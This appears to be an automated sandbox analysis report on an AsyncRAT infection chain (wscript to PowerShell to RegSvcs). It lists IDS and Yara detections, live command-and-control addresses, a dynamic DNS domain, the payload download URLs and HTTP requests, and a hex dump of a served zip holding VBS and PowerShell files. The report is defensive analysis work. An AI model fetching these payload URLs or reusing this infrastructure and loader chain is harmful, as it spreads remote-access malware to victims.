CIVll2leakz1D0XLqLYgTDQvLuEdB09vBKmNLZrkvru0NUr24BKTNWmrvH46zDl6IxIEhvbXg5Ak6l1ZOZAf6H3Hru9t7kLypcK+ednvVkvduOD6KaFxS/tNz4beJwUJaDXcVwN4TcFy8vFryz2qV7MlCNS6Yx3lcpPp6Yf6wQH/NEFIewDAyQX0QMLQBlomEH2fb7SxNGbtNQWVGJm6Mrub2IjdkIxMLw31qVTewr4yhAi310FGiH/SXw6FD38YI+x9T4fsI4Xqvt1K1kCePZsvSEGtGqUz5wIY7VIxIcGIGF/w4vG8Xs4L7qaH51LMkht+XoAWs9y1FLOAA1jjQ2DPdI7MmBIj0TUbhnGEnUU0hdMzQzBjJvA8oIkEfKwS7oYN1ZJk4JDZ/nGkEM/PQ==", "Server Signature": "jdAfMroNuxWW5Kigy48Cl6ea80yF1X+/9af0C/DbKkem2xPCpwp3LASD6xjO1tx3LQ5eOhRwHr6h9Bp+FrzIGZD/GjbyydyMYejz1eEnQbrHZzdO04P/xXT9LAM/sntbjRkbF3EtdhDUt+slLSPuPHZuJyadl43H54HiZyzvlT50FmvzERMAeN91gLj0fIJ+O8z/WHjVYZcYS06mC1B57qf6c264eozPvpy6Mac8WnjJx/SFJfOKGLrvMQCYu26FW8kZZ4vleRDCK4PpH62HrJa8s21tqWy6TcgNiiy3SD9F3wgfEXwRwB5I6ZnYIHP+QSyEM66RtypRaOUmOyOkoqlyIutxWbs3ISaJDoxURClcEqAQLe+mN6MGCnt4Y2ywLbfggQ6xmzA+uOfK/8rmib0/7bQbOlnroKHrcU/ygcy54qO4wvor/1GA2hV4YFUPBzRUIH748YVnVqFrHJUj+/AeBv/B++t2n/NYoQF6Zvhn2l6e+RMfzaIUYFYpEnhnoapaNOA2v71uiriVVoQywbz0u1LuWh+gXodgptcrVn44SpJcRU4XnHFFarHum2Sn4i3xZXXgYsOlIhCOWdfiw71lHCkicU7gGB7gDUC0G4d4UvnEgUBFNRvuT2hxSKnHu4Oq2XnHnOvD4vsP8Sk2DCEav/WxKKxWqHf3fReUJRw="}
              Source: Binary string: NewPE2.pdb source: powershell.exe, 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: NewPE2.pdbxf source: powershell.exe, 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 103.195.101.9:6666 -> 192.168.2.6:49711
              Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 103.195.101.9:6666 -> 192.168.2.6:49711
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 212.23.222.200 222Jump to behavior
              Uses dynamic DNS services
              Source: unknownDNS query: name: shefonew07.ddns.net
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 222
              Source: unknownNetwork traffic detected: HTTP traffic on port 222 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 222
              Source: unknownNetwork traffic detected: HTTP traffic on port 222 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 222
              Source: unknownNetwork traffic detected: HTTP traffic on port 222 -> 49703
              Yara detected Generic Downloader
              Source: Yara matchFile source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPE
              Source: global trafficTCP traffic: 192.168.2.6:49699 -> 212.23.222.200:222
              Source: global trafficTCP traffic: 192.168.2.6:49711 -> 103.195.101.9:6666
              Source: Joe Sandbox ViewASN Name: RELIABLESITEUS RELIABLESITEUS
              Source: Joe Sandbox ViewASN Name: TMRDE TMRDE
              Source: global trafficHTTP traffic detected: GET /DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 212.23.222.200:222Connection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.222.200
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 Mar 2024 15:34:54 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 07 Mar 2024 01:32:20 GMTETag: "17b85-613080be7586c"Accept-Ranges: bytesContent-Length: 97157Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: image/jpegData Raw: 50 4b 03 04 14 00 00 00 08 00 c7 71 66 58 69 ec 44 a3 1d 01 00 00 55 02 00 00 18 00 00 00 54 65 78 74 43 5a 76 54 62 59 4d 45 59 73 70 67 61 50 56 6f 2e 76 62 73 95 92 3b 6f 83 40 10 84 fb 93 ee 3f 9c a8 1c 09 21 ea 48 29 12 82 b1 63 03 e1 e1 38 05 0d 8f c5 10 c1 81 ef 81 30 bf 3e d8 58 29 30 4d da d9 bd 99 6f b4 e7 52 62 32 d6 30 e2 03 97 35 10 07 7a 81 d1 7b 59 93 7c f0 84 94 dd 9e c1 65 13 da eb 72 52 2f ed e9 63 6f b9 67 bf 3b 08 d3 fe ea 26 35 6c dd f8 b5 e9 cf e5 60 15 14 76 06 46 f3 3d f2 42 d6 71 c5 01 a3 f9 ee 38 d1 31 0a 40 3c 24 8e 13 83 41 2c c0 4d 7e 20 15 2b e5 18 a4 ac 6c 85 16 14 50 55 ca d3 9d e8 fb b8 ce 8a e1 18 f8 b6 37 74 83 89 d1 5c 19 7d 14 3a fa 73 e0 bc 6c a8 b2 c8 30 0f d7 7c 49 57 73 27 95 e8 2a 09 99 84 31 7b 9b 93 a5 2a 24 2c 80 2e f6 bf be c3 c8 a4 19 d9 e6 13 3a f4 90 4a 31 22 19 4d 5d c7 34 c3 68 ae 5c d1 8d e7 e8 c0 81 f1 e8 53 26 55 99 46 74 e7 d4 70 da 78 6f 49 5d 79 76 e8 68 49 2c 94 1b cf 43 e8 c4 b2 54 ed 21 5b bd 5e c1 bc 5d e8 1f fb f7 32 7f bf c8 6a c2 86 e8 bf 50 4b 03 04 14 00 00 00 08 00 60 71 66 58 50 b6 2b 5b 66 01 00 00 1b 02 00 00 14 00 00 00 44 6e 57 45 64 46 50 65 6d 5a 76 64 74 4b 52 73 2e 70 73 31 5d 51 bb 6e eb 30 0c dd 2f d0 7f 10 8c 0e 0e d0 08 7d 00 77 30 d0 a1 75 fa c8 90 36 88 dd bb 34 1d 14 8b 71 d4 c8 52 40 d2 09 fc f7 95 14 a3 c3 d5 42 f1 71 c8 c3 c3 8b 3f 97 ed 20 ee c5 1b 9c a6 ef 9b 6f 68 58 4c 4b df 8d df aa d9 81 ee 2d c8 0a f0 68 1a 48 d5 b2 f4 ce 85 6c 3e 09 2e eb 00 8e c1 d0 a0 56 b4 cf af cf 51 b9 82 d6 10 a3 62 e3 dd dc 6d bd 9c 01 35 68 0e d1 0f 90 6c d5 3b 12 4a 9c 63 02 8e 80 83 b8 15 9d 71 3d 03 65 e7 1e 15 30 1b d7 92 7c 72 6a 63 21 8d 62 ec e1 bf ec cc 90 b2 d6 9f 2a 56 c8 f3 ed bb 7b 54 cc 80 06 28 02 b6 ca 52 44 10 27 b8 96 35 9a b6 05 24 59 22 28 86 fc 66 92 b2 32 c1 1f 7d ef b4 c2 28 c9 e7 2c 64 6b d3 c1 57 51 bc f9 93 ac 7d c5 18 06 e6 d9 10 de 74 b1 98 6a 5d bf be 16 5d 57 10 65 63 93 15 1c 80 4d 5c 52 ce 5d 20 71 54 36 6e bb ac 6f 17 71 a9 61 3f 92 78 68 62 cd 2f 87 a4 da b0 97 4b c5 bb 58 5f 16 eb 0f 0a 1c d7 cb 7e 63 4d b3 0e ea ae f4 e1 d9 20 71 8d 83 3c 6e 92 44 8e 46 f1 5f 80 9f bd d5 80 79 b6 4e 4c 1c 8d 07 00 8c 57 99 c1 d6 b8 c4 2a cf ca 1d fa 0e 3e 0e 3a cc fd 77 93 5d 45 3a 57 e2 6f b0 ae b7 f6 d7 dc 4d 7e 00 50 4b 03 04 14 00 00 00 08 00 87 71 66 58 fc 15 3f f5 1e 01 00 00 58 02 00 00 12 00 00 00 4e 65 77 52 64 70 46 69 72 73 74 54 72 79 2e 76 62 73 95 52 cf 6f 82 30 14 be 37 e1 7f 68 38 b9 c4 10 cf 4b 76 58 90 11 c8 14 10 c8 cc e2 05 e8 43 3b b1 95 b6 e0 c6 5f bf 2a 66 87 ca 65 c7 7e ef eb f7 23 ef 45 0c 7b 42 70 81 37 20 bb 13 e0 35 7c 2b 0b 2d e9 09 c7 51 15 0c 4b 22 bc 75 fb 9e b5 3f ab 11 cd 7b c1 c2 be 4b 68 22 52 ff 13 92 11 55 2b
              Source: global trafficHTTP traffic detected: GET /DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 212.23.222.200:222Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Thu, 07 Mar 2024 01:32:20 GMTUser-Agent: Microsoft BITS/7.8Host: 212.23.222.200:222
              Source: unknownDNS traffic detected: queries for: shefonew07.ddns.net
              Source: wscript.exe, 00000000.00000003.2073944841.00000230DD075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.23.222.200/
              Source: svchost.exe, 00000005.00000002.3363633322.000001B3F889D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.23.222.200:222/
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D28234000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2184867444.000001B3F86C1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.3362132937.000001B3F3F40000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.3362325137.000001B3F3B04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.3361893413.000001B3F8A20000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3363633322.000001B3F8885000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.3361909883.000001B3F8C30000.00000004.00000800.00020000.00000000.sdmp, sExygfKkJDoIUpeo[1].txt.0.dr, qmgr.db.5.dr, edb.log.5.dr, NDKJPlEEYLhKqtGW.xml.0.drString found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg
              Source: wscript.exe, 00000000.00000003.2074008189.00000230DD030000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2259396979.00000230DEDC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2259220217.00000230DEDC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt
              Source: wscript.exe, 00000000.00000003.2075147627.00000230DEE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2261063964.00000230DEE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075013439.00000230DEDC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2074969549.00000230DEDBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2073866186.00000230DEDC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2259363764.00000230DEE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075056628.00000230DEDF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt-
              Source: wscript.exe, 00000000.00000002.2260569508.00000230DCFF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt.h
              Source: wscript.exe, 00000000.00000003.2074008189.00000230DD030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt=
              Source: wscript.exe, 00000000.00000003.2073944841.00000230DD075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtC:
              Source: wscript.exe, 00000000.00000003.2075096466.00000230DEDC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2261063964.00000230DEDC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2074969549.00000230DEDBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2259396979.00000230DEDC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2259220217.00000230DEDC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtHipCnxPXXkVjHFzoPKBdNvbdd41UoIiutyTAq
              Source: wscript.exe, 00000000.00000003.2074008189.00000230DD030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtLMEM
              Source: wscript.exe, 00000000.00000003.2073944841.00000230DD08F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtX
              Source: wscript.exe, 00000000.00000003.2073944841.00000230DD08F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtf
              Source: wscript.exe, 00000000.00000002.2260569508.00000230DCFF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtvh
              Source: RegSvcs.exe, 00000016.00000002.4628005703.0000000005250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: RegSvcs.exe, 00000016.00000002.4628005703.0000000005250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
              Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: RegSvcs.exe, 0000001F.00000002.2797263415.0000000000E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c%
              Source: powershell.exe, 00000003.00000002.2234682479.0000016D37FFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA7EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910186000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D28593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D27F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2236404670.00000288DA771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2326561613.000001383AA61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2739422188.000002D900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3969619854.000002B30F081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D28593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000026.00000002.4487918379.000002B32711F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: powershell.exe, 00000026.00000002.4487918379.000002B32711F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cRooCerA
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D27F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2236404670.00000288DA771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2326561613.000001383AA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2739422188.000002D900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3969619854.000002B30F081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D288FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2192080087.0000016D28DE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2192080087.0000016D28E0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D28E0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
              Source: powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
              Source: svchost.exe, 00000005.00000003.2102025199.000001B3F86C0000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
              Source: powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D29A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2236404670.00000288DB39D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: wscript.exe, 00000000.00000003.2073944841.00000230DD075000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2260569508.00000230DD073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: powershell.exe, 00000003.00000002.2234682479.0000016D37FFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA7EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910186000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Yara detected AsyncRAT
              Source: Yara matchFile source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4156, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7092, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
